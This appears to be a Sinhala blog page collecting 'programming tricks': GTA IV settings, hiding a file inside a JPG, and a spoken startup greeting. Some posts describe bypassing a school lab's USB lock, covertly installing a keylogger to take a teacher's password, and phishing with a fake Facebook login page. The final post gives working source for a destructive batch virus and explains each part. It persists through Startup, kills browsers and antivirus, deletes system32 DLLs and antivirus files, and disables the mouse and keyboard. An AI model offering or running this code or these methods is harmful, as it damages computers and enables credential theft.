Email
Showing posts with label Programming tricks. Show all posts
Showing posts with label Programming tricks. Show all posts
අද ම කියන්න යන්නෙ අලුත්ම trick එකක් ගැන. ගොඩක් අය ඉතින් GTA IV ගැන දන්නවනෙ. හැබැයි ඉතින් අවුල තියෙන්නෙ ඕන ගොඩක් Onboard vga වල වැඩ නැහැ. ඔන්න ඕකට විසදුමක් හොය හොය ඉන්නකොට තමා මට මේ ක්‍රමේ හම්බුනේ. මේ විදියට 256 MB Onboard vga එකක් තියෙන computer වලත් minimum settings දාලා GTA IV play කරන්න පුලුවන්.

gta iv onboard vga වලත් play කරමු

ඔක්කොටම කලින් ඉතින් gta iv computer එකට install කරන් තියෙන්න ඕනි. නැති කෙනෙක් ඉන්නවනම් පහලින් download කරගන්න.

4.43 GB 
මේකෙ audio අයින් කරලා තියෙන්නෙ game එකේ size එක අඩුකරන්න.




7.04 GB
මේක original version එක.




දැන් game එක run කරල බැලුවාම මෙන්න මේ විදියටනම් ගේම් එක පේනේනෙ ඒ කියන්නෙ vga එක මදි.


දැන් ඉතිං මොකෝ කොරන්නෙ. පොඩි දෙයයි කරන්න තියෙන්නෙ. පහල තියෙන විදියට කරන්න.

1.  GTA IV install කරලා තියෙන තැනට ගිහින් commandline කියල notepad file එකක් හදන්න.

2. දැන් මෙන්න මේ ටික ඒකට paste කරලා save කරන්න.
-norestrictions
-nomemrestrict
-percentvidmem 100
-availablevidmem 25.0
-refreshrate 40

3.  දැන් ගේම් එක run කරල බලන්න. තවමත් හරි ගිහින් නැත්නම් ඔය කොල පාටින් තියෙන තැන් වලට අඩු අගයයන් දාලා බලන්න. 90% ක් විතර computers වල ඔය ක්‍රමෙන් ගේම් එක play කරන්න පුලුවන්.

වැඩේ කරන හැටි තේරෙන්නෙ නෑ නෑ වගේනම් මේ video එක බලන්න.


ප.ලි. : windows 7 වල ගේම් එක play කරන්නනම් 1.5GB වත් ram එකක් ඕනි වෙයි.

මේ දවස් වල බ්ලොග් එකට ආවාම auto ඇඩ් redirect වෙනවා. බලන අයට ඒක මල ඇණයක් උනත් කරන්න දෙයක් නෑ මේ දවස් වල සල්ලි චුට්ටක් ඕනි වෙලා තියෙනවා. තව ටික දවසකින් ඒක අයින් කරන්නම් එතකම් තරහ නැතුව ඔහොම බලන්න ඈ.... :)


ඔන්න ඉතින් තාලෙකට පස්සෙ මම ආව තව trick එකකුත් අරන් ඔන්න ඉතින් තාලෙකට පස්සෙ මම ආව තව trick එකකුත් අරන් :P... අද මම කියන්න යන්නෙ Image එකක් ඇතුලෙ File එකක් හංගන්නෙ කොහොමද කියලා..



දැන් ඉතින් කට ඇරන් බලන් හිටියට හරියන්නෙ නෑ මෙන්න මේ පහල තියෙන විදියට තමා කොරන්න ඕනි. මොකක් හරි අවුලක් ආවොත් comment එකක් දාන්න ඈ..

1. මුලින්ම වැඩේට Image එකක් ඕනි වෙනවා. (ඔව් ඔව් ඒක අස්සෙ තමා File එක හංගන්නෙ)

2. ඊටපස්සෙ දැන් ඔය Image එක අස්සෙ හංගන්න යන File එක තියෙනවනෙ. අන්න ඒක Winrar වලින් .RAR Format එකට compress කරගන්න. (ඕනි file එක උඩ rclick කරල add to archive, ඊටපස්සෙ ok click කරන්න.)

3. දැන් ඉතින් ඔය Image එකයි .RAR Format එකට හදාගත්තු File එකයි එකතැනකට copy කරගන්න. (මම file 2ම D: එකට copy කරනවා.)

4. දැන් windows key+ r ඔබලා cmd කියලා ගහලා OK කරන්න.

5. දැන් මේ Image එකේ තියෙන විදියට Command prompt එකෙන් ඔයාලා Image එකයි .RAR Format එකට හදාගත්තු File එකයි copy කරපු තැනට යන්න. (මම copy කරලා තියෙන්නෙ D: එකට නිසා මට තියෙන්නෙ D: කියලා ගහන්න විතරයි.)
D:


6. දැන් මෙන්න මෙහෙම type කරන්න.
Copy /b imagename.jpg + filename.rar final.jpg
  (imagename කියන තැනට ඔයාගෙ image එකේ නමත් filename කියන තැනට ඔයාගෙ file එකේ නමත් final කියන තැනට කැමති නමකුත් දෙන්න)

  (මගේ imagename එක sunset, filename එක windows කියලා තියෙන්නෙ.)


7. වැඩේ හරිගියානම් මෙහෙම එයි.


දැන් වැ‍ඩේ හරි. දැන් final.jpg කියන එක ක්ලික් කලොත් ඕපන් වෙන්නෙ pic එක. :D

                 දැන් ඉතින් යන්නද හදන්නෙ. ඇයි මනුස්සයො ඕක ඇතුලෙ තියෙන file එක Open කරගන්න හැටි දැනගන්න ඕනි නැද්ද. :P ඒක කොරන්නෙ මෙහෙමයි.

1. Winrar open කරන්න.
2. ‍file > open archive ගිහින් files of type එන all type දීලා image එක open කරගන්න.

දැන් ඉතින් වැඩේ ගොඩනෙ. යන ගමන් FB fan page එකට like එකක් දාගෙනම යන්න ඈ... :P



අද ඉතින් කියන්න යන්නෙ චූටි trick එකක් ගැන... මම ඉස්කෝලෙදි කරපු පොඩි හොර වැඩක් තමා මේක. :D

Windows command prompt එක ගැන දැනුමක් තියෙන අයටනම් මේක වැඩක් නැතිවෙයි.

මෙන්න මේකයි seen එක. අපේ ඉස්කෝලෙ computer lab එකට අලුතෙන් computer තොගයක් ආවා.. මම ඉතින් ෆුල් හැපි එකේ හිටියෙ දැන්නම් ඉතින් යන්තම් ඉතින් ඉස්කෝලෙ ඉන්නකොටත් ආතල් එකේ මොනව හරි කර කර ඉන්න පුලුවන් කියලා.. මම ඉතින් ඒ දවස් වල ඉස්කෝලෙ period වලින් බාගෙකම ඉන්නෙ ඕක ඇතුලෙ තමයි.. sir ගෙනුත් ඇතිවෙන්න බැනුම් අහනවා.. සර් ඉතින් හරි හොදයි අපි කොයිවෙලෙත් lab එක අස්සෙ කියල අපේ පිනා (ප්‍රින්සිපල් :D) ගෙනුත් බැනුම් අහගෙන මොකූත් නොදන්න පොඩි එකා වගේ ඉන්නවා...

ඔන්න ඉතින් computer ටික ඇවිත් ටික දවසකින් මම මගේ ඒ දවස්වල තිබුන 4GB pen රාජයා අරගෙන ගියා lab එකට.. සර් අමුතු හිනාවකුත් දාගෙන කිව්වා කරන වැඩක් කරගෙන ඉක්මනට යන්න කියලා..  මමත් ඉතින් හා කියල ගිහින් ආතල් එකේ com එකක් ගාව ඉදගෙන පොර වගේ මගේ pen රාජයා ගැහුවා com එකට... ගැහුවාම තමා තේරුනේ sir මට නිකන් සවුත්තුවට වගේ හිනා වුනේ ඇයි කියලා... lab එකේ තිබුන හැම com එකකටම USB Block කියලා soft එකක් දාලා.. pen එක ගහන්න බෑ password එකක් ඉල්ලනවා..


දැන් ඉතින් මට උපරිේටම ද වුනා.. (එකෙක්වත් වෙන මුකුත් හිතන්න එපා තද වුනා කිව්වෙ තරහ ගිය එකට ඈ ) ඇයි යොන මගුලක්ද ේ කරලා තියෙන්නෙ.. මට හිතුනා ේකනම් මම හැමතිස්සෙම ඇවිත් sir ට වතයක් වෙන එක නවත්තන්නම කරපු වැඩක් කියලා... :D දැන් ඉතින් මට sir ට කියලා password එක ඉල්ලගන්නත් ොකද්ද වේ එහෙම වුොත් ඉතින් ොදට ඉන්න මම පට්ටම චාටර් වෙනවනෙ.. හරි කමක් නෑ ඕනි මගුලක් කියලා මම සර්ට යන්නම් කියලා ආවා. සර්ත් ඉතින් ොකු දෙයක් ේ මම දිහා බලලා හා කිව්වා..

ඔන්න ඉතින් ගෙදර ඇවිල්ලත් ඕක ගැන තමා මට මතක් වෙන්නෙ.. අන්තිමට ොම හරි ොඩි වැඩක් ඔලුවට වා කරල බලන්න ඕනි කියලා.. ඔන්න ඉතින් ඊළග දවසෙ මම lab එකට ගිහින් සර්ට කලින් දවසෙ වේම ගිහින් කතා කරල ොඩි වැඩක් කියෙනවා ඉක්මනට කරගන්නද ඇහුවා.. සරුත් ඉතින් එකපාරටම හා කිව්වා ඉතින් sir දන්නවනෙ මම දැන් ආපු ගමන් යනවා කියලා :D

ඔන්න ඉතින් මම ගිහින් වෙනදා වේම pen එක ගහලා cmd එක open කරගත්තා.. දැන් ඉතින් බැලුවා cmd කෙන් pen එකට යන්න පුලුවන්ද කියලා. වැොඩ. හැබැයි ඉතින් dir කියලා ගැහුවට directory එක පෙනුනෙ නෑ. මම නිකන් කනාවට ේ මම pen එේ folder එකක් වත් හදන්නැතුව නිකන් දාලා තිබුන ොඩි program එකක නම  මතක තිබිලා ක ගැහුවා.. ඒකත් වැඩ කලා.. මට දැන් ෆුල් හැපි. ඊටපස්සෙ මම cmd වලින්ම file එකක් copy කරලත් බැලුවා නියමෙටම copy වෙලා තිබුනා.. ම ඉතින් ොර වේ ගිහින් සර්ටත් කියලා ඔන්න sir lock දැම්මට වැඩක් නෑ මම වැේ කරගත්තා යන්නං කියලා වා.. :D (පස්සෙ මම හිමින්සැගිහින් keylogger එකක් දාලා password එක ොයාගත්තා ඒක ඉතින් වෙන කතාවක් :D ;
Sir ගැනත් ඉතින් ොනව හරි කියන්න ඕනි නෙ. ඒ සර් තමා මට හම්බුන ොදම IT සර්.. ඇත්තටම ළමයි එක්ක ොඩක් එකතුවෙන් ඉන්න නියමම sir කෙනෙක් :D)

ඔන්න ඉතින් blog එක කියවන  අයටත් කරල බලන්න මම ඒ command ටික පහලින් දැම්මා.


කස්ටිය තරහ නැතුව ඉතුරු ටික මේ පහල තියෙන link එක click කරල බලන්න මොකද post එක දිග වැඩි උනාම බ්ලොග් එක අවුල් යනවා...


ඔන්න එහෙනම් අද ඉදන් මම hacking ගැනත් කියලා දෙනවා.මුලින්ම කියන්න ඕනි මමත් තාම hacking ගැන ඉගෙනගන්න නිසා ගොඩක් දේවල් දන්නෙ නෑ. ඒ වුනාට මම දන්න ටික කියලා දෙන්නම්කෝ.............

හරි එහෙනම්... ගොඩක් අය දන්නවනෙ phishing කියන්නෙ මොකක්ද කියලා..හැබැයි ඉතින් දන්නැති අයත් ඇතිනෙ.phishing වලදි කරන්නෙ කාව හරි රවට්ටලා තොරතුරු ගන්න එක.මේකෙදි කරන්නෙ original page එක වගේ fake page එකක් යවන එක. උදාහරණයක් විදියට ඔයාට ඕනිනම් කාගෙහරි facebook එකේ user name එකයි password එකයි ගන්න ඔයා මේ විදියෙ phishing page එකක් එයාට යවලා එයත් ඒකට  අහුවුනොත් ඉතින් වැඩේ ගොඩ... මෙහෙම කොච්චර කිව්වත් හරියන්නෑ ඕක පෙන්නනකම්....


Original Facebook login page
___________________________________________________________________________________

Fake Facebook login page (phishing page)


පේනවනේ...address එක විතරයි වෙනසකට තියෙන්නේ...

ඉතුරුටික බලන්න මෙතනින් යන්න post එක ටිකක් දිග නිසා නැත්නම් blog එක අවුල් යනවා...


S259VEJTCQZQ
ගොඩක් අය දැකල ඇති නේද ඔය films වල එහෙම computer එක on කරනකොට welcome sir වගේ මොකක් හරි කියනවා.. අන්න ඒ වගේ අපේ computer එකත් on වෙනකොට අපිට welcome කියන්න computer එක හදාගන්න හැටි තමයි මම අද කියන්න යන්නෙ..

  • මුලින්ම notepad එක open කරගෙන පහල තියෙන code එක paste කරගන්න. 
    Dim speaks, speech
    speaks="Welcome to your PC, Tech Tricks Lanka"
    Set speech=CreateObject("sapi.spvoice")
    speech.Speak speaks

  •  දැන් ඔය Tech Tricks Lanka කියලා තියෙන තැනට ඔයාගෙ නම දෙන්න.
  • File > Save as ගිහින් Save as type එක all කියලා තෝරලා Welcome.vbs කියලා නම දීලා save කරන්න.
  • Save කරපු file එක Copy කරගත්තට පස්සෙ Computer එකේ තියෙන්නෙ Windows XP නම් C:\Documents and Settings\All Users\Start Menu\Programs\Startup කියන තැනට යන්න.
  • Windows 7 නම් C:\Users\{User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup කියන තැනට යන්න. (AppData කියන folder එක hide වෙලා තියෙන්නෙ. ඒක බලාගන්න folder option වලින් show hidden files and folders කියන එක තෝරන්න)
  •  දැන් ඔය file එක startup folder එක ඇතුලට paste කරන්න.
  • දැන් ඉතින් restart කරලා බලන්න..


ප.ලි : සද්දෙ හොදට ඇහෙන්නෙ නැත්නම් පහල තියෙන විදියට කරන්න.

Windows XP

1. Control Panel ගිහින් Switch to Classic View දෙන්න.

2. Sounds and Audio Devices ගිහින් sound tab එකට යන්න.

3. Sound Scheme වලින් no sound කියන එක තෝරන්න. (එහෙම නැත්නම් ඒ tab එකේම පහල තියෙන program events කියන එකෙන් Windows logon select කරලා ඊට පහල තියෙන sounds කියන dropdown menu එකෙන් none කියලා තෝරලා apply කරන්න.)

Windows 7

1. Control panel > Hardware and Sound > Sound කියන එකට ගිහින් sound tab එකට යන්න.

2. ඒ tab එකේම පහල තියෙන program events කියන එකෙන් Windows logon select කරලා ඊට පහල තියෙන sounds කියන dropdown menu එකෙන් none කියලා තෝරලා apply කරන්න.


Batch programming වලට ආස සෙට් එකට තමා මේක. ටිකක් පරණ පොතක් ඒ වුනාට ඉතින් අවුලක් නෑ :D. මම කලින් දැම්ම notepad tricks වගේ ඒවා හදන්නෙත් මෙහෙම තමා.... පොතනං ඉතින් මම ලියපු එකක් නෙමෙයිලු ඈ... ලියල තියෙන්නෙ Premkumar කියලා කෙනෙක්... පොඩි අස්පට් එකකට තියෙන්නෙ තියෙන්නෙ English වලින්...මමත් ඉතිං දුක තමා කියල  madhura dic එක පැත්තකින් තියාගෙන තමා පොත කියෙව්වෙ... හැබැයි ඉතිං වැඩි අවුලකුත් නෑ ඕනි පොඩි එකෙක්ට තේරෙන්න ලියලා තියෙනවා...

Download      (3 MB) 

ප.ලි. මේ වගේ තව ebook තියෙනවනම් තනියම බලන්නැතුව මටත් දෙන්න හොදේ.... link එකේ අවුලක් ඇවිත් තිබුනා ඔන්න ආයෙ දැම්මා........


Notepad tricks කියලා මම දාපු ලිපිය ගොඩක් දෙනා බලල තිබුනා.. ඉතින් මට හිතුනා virus එකක් හදන හැටි කියලා දුන්නනම් හොදයි කියලා...හැබැයි ඉතින් මේවා ඕනි නැති වැඩවලට පාවිච්චි කරන්න එපා හදන්නෙ කොහොමද කියලා විතරක් දැනගන්න....:D

මේකත් හදන්න තියෙන්නෙ notepad එකෙන්ම තමයි...වෙනස තියෙන්නෙ start up එකේදිත් වැඩකරනවා විතරක් නෙමෙයි explorer.exe, chrome.exe and firefox.exe වගේ process එහෙමත් run වෙන්න නොදී kill කරනවා.....හැබැයි ඉතින් වැඩේ සාර්ථක xp වල විතරයි.මොකද කියලනම් අහන්න එපා මමත් seen එක දන්නෑ..:D


මුලින්ම පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all කරලා virus.bat කියලා දීලා save කරන්න. (virus.bat වගේ) .exe එකක් හදාගත්තත් කමක් නෑ.
@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe
cd C:\WINDOWS
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * this is a virus

 දැන් මම කියල දෙන්නම් ඔය උඩ තියෙන codes වලින් මොකද වෙන්නෙ කියලා..

       1. මේ කොටසෙන් කරන්නෙ virus.bat කියන අපි හදාගත්තු file එක startup එකට , C: එකට, my documents folder එකට copy වෙන එක.

@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"

       2. මේ කොටසෙන් වෙන්නෙ Internet Explorer, yahoo messenger එක වගේ files වල task kill කරන එක,වෙලාව 12:00 ට වෙනස් කරන එක,  install කරල තියෙන්නෙ norton antivirus එකනම් ඒකෙ අත්‍යාවශ්‍ය files delete කරන එක වගේ දේවල්.

tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe

     3. මේ කොටසෙදි වෙන දේ තමයි windows/system32 වල තියෙන dll file ඩිලීට් වෙන එක..මේක computer එකට කොච්චර බලපානවද කියල ඉතින් කියන්න ඕනි නැහැනෙ. install කරල තියෙන්නෙ macafee antivirus එකනම් ඒකෙ අත්‍යාවශ්‍ය files delete කරන එකත් තියෙන්නෙ මේ ටිකේම තමයි. virus එක copy වීමත් මේ ටිකේදි සිද්ධවෙනවා...

cd C:\WINDOWS
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * Techtrickslanka

    4. Mouse එකයි keyboard එකයි disable වෙන එකයි තමයි මේ කොටසින් වෙන්නෙ.

rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable


     ඉතින් code ටික බලපු dos command ගැන ටිකක් හරි දන්න අයට තේරෙන්න ඇති මේකෙ ගොඩක් use කරල තියෙන්නෙ dos commands කියල (කොහොමත් එහෙම වෙන්න ඕනිනෙ මේක dos application එකක්නෙ :D) ඉතින් පේනවා ඇතිනෙ dos commands ටිකක් හරි දන්නවනම් වැඩේ ගොඩ කියලා.

මේක ටිකක් වෙනස් කරල හදල බලන්න. මම දීපු code එක run නොකර පුලුවන් නම් පොඩි code එකක් හදාගෙන run කරන්න try එකක් දෙන්න.

උදාහරණයක් විදියට පහල තියෙන code එක බලන්න.ඔය code එක වැඩනම් තව ටිකක් එකතු කරල තව ටිකක් හොදට හදාගෙන අන්තිමට හොද code එකක් හදාගන්න බලන්න.
@echo off
copy "virus.bat" "D:\" 

මම දීලා තිබුන notepad tricks වලටත් මේ කෑල්ලක් දෙකක් දාල බලන්න සමහර විට වැඩකරයි.





එහෙනම් ඉතින් post එක ඉවරයි යන ගමන් අදහසක් දාගෙන යන්න..............................
තවත් එකක් නොව සියල්ලටම එකක්.....